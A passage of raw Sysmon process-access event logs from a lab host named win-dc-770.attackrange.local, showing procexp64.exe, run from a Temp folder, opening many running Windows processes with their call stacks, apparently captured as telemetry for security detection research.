System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 